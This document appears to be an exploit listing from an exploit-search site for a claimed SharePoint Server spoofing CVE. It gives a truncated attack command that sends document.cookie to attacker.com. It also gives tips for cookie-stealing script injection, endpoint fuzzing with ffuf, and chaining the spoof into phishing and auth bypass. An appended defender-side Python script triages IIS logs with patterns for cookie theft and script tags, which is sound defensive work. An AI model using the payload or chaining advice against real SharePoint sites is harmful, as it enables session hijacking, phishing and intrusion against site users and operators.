## https://sploitus.com/exploit?id=47373EE1-4958-5E36-829F-2892D366ECFB
# Overview
Python exploit for CVE-2026-32201 - improper input validation in Microsoft SharePoint Server, allowing unauthenticated network spoofing (C:L/I:L).
* Affected: SharePoint Server 2016 Enterprise, 2019, Subscription Edition

```bash
… fetch('http://attacker.com/?c='+document.cookie)" \
  --endpoint /_layouts/15/notify.aspx
```
Output example:
```bash
[+] SharePoint detected.
[*] Sending spoofed request to https://target.com/_layouts/15/notify.aspx
[+] Status: 200
[+] Potential success: Check target logs/email for spoofed content.
```
# Customization
* Endpoint fuzzing: `ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt`
* XSS payload: Add JS in `--message` for cookie theft
* Chaining: Spoof → phishing link → auth bypass
# Verification
* Success indicators: 200 OK + "sent/success" in response
* Server-side: Check ULS logs/IIS logs for anomalous requests
* Impact: Monitor email/docs for forged sender, test data modification
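
For the server-side IIS log check listed above, the following is an added defender-side example, not part of the exploit repository. It triages W3C-format IIS logs for anonymous requests under `/_layouts/15/`. The sample log lines, the `message` query parameter name and the enumeration threshold are constructed assumptions. IIS does not log POST bodies, so a payload sent in a body only appears as the `anonymous-post` finding.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed IIS W3C sample (not real traffic); "message" is an assumed parameter name.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2026-01-01 10:00:01 GET /_layouts/15/start.aspx - CONTOSO\\alice 10.0.0.5 200
2026-01-01 10:00:02 GET /_layouts/15/aaa.aspx - - 203.0.113.7 404
2026-01-01 10:00:02 GET /_layouts/15/bbb.aspx - - 203.0.113.7 404
2026-01-01 10:00:03 GET /_layouts/15/ccc.aspx - - 203.0.113.7 404
2026-01-01 10:00:09 POST /_layouts/15/notify.aspx - - 203.0.113.7 200
2026-01-01 10:05:00 GET /_layouts/15/notify.aspx message=%3Cscript%3Ealert(1)%3C/script%3E - 198.51.100.9 200
"""

LAYOUTS = "/_layouts/15/"
SCRIPT_MARKERS = re.compile(r"<script|document\.cookie|fetch\(|javascript:", re.I)
ENUM_THRESHOLD = 3  # assumed value: distinct 404 paths per client before flagging

def parse(log_text):
    """Yield one dict per request, using the #Fields header for column names."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))

def triage(log_text):
    """Return (reason, client_ip, detail) for anonymous requests under /_layouts/15/."""
    findings, misses = [], defaultdict(set)
    for row in parse(log_text):
        stem = row["cs-uri-stem"].lower()
        if not stem.startswith(LAYOUTS) or row["cs-username"] != "-":
            continue  # other paths and authenticated users are out of scope
        ip, status = row["c-ip"], row["sc-status"]
        if status == "404":
            misses[ip].add(stem)  # track distinct missing pages per client
        elif status == "200" and SCRIPT_MARKERS.search(unquote_plus(row["cs-uri-query"])):
            findings.append(("script-in-query", ip, stem))
        elif status == "200" and row["cs-method"] == "POST":
            findings.append(("anonymous-post", ip, stem))
    for ip, stems in sorted(misses.items()):
        if len(stems) >= ENUM_THRESHOLD:
            findings.append(("layouts-enumeration", ip, f"{len(stems)} distinct 404 paths"))
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Sites that intentionally allow anonymous access will produce `anonymous-post` hits for legitimate traffic, so treat the output as a triage list to correlate with ULS logs rather than as a verdict.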